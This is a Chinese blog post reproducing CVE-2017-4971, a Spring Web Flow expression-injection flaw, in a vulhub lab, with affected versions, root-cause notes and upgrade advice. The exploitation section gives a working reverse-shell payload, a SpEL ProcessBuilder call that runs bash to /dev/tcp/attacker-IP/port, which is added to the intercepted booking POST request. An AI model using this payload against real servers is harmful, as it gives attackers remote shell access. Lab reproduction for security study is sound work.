spring 代码执行 (CVE-2017-4971)复现


所有文章,仅供安全研究与学习之用,后果自负!

spring 代码执行 (CVE-2017-4971)

0x01 漏洞描述

Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流” 由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞
详细漏洞分析

https://paper.seebug.org/322/

0x02 影响范围

Spring Web Flow 2.4.0 – 2.4.4
注:官方停止支持的更早的版本也受影响。

不受影响的版本
Spring Web Flow 2.4.5

0x03 漏洞复现

(1) 访问靶场
在这里插入图片描述
点击左上角login
(2)
在这里插入图片描述
用左边给出的账号进行登录

在这里插入图片描述

(3)
点击观看酒店

在这里插入图片描述

点击订购酒店
在这里插入图片描述

按需求填好后 点击 proceed 继续
在这里插入图片描述

点击confirm前 开启抓包
在这里插入图片描述

反弹shell

post 请求包中 加入如下payload

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub

攻击机 监听端口
放包
在这里插入图片描述
反弹shell成功
在这里插入图片描述

原理
就是在订阅酒店处,存在一个命令执行,直接调用了两个函数,这两个函数,一个是:addDefaultMappings ,一个是 addModelBindings。

其中,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行。所以条件有两个:

(1)binder节点为空;

(2) useSpringBeanBinding 默认值(false)未修改。

由此可实际在代码中找到该页面,节点为空(代替命令执行语句)+默认值为false(点击Confirm按钮)

0x04 漏洞修复

建议相关版本的用户采取如下措施进行缓解

2.4.x用户升级到2.4.5
建议在视图状态中始终使用显式数据绑定声明, 以防止表单提交在不应设置的目标对象上设置字段。
Spring Web Flow with JSF 的用户不受到影响.

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值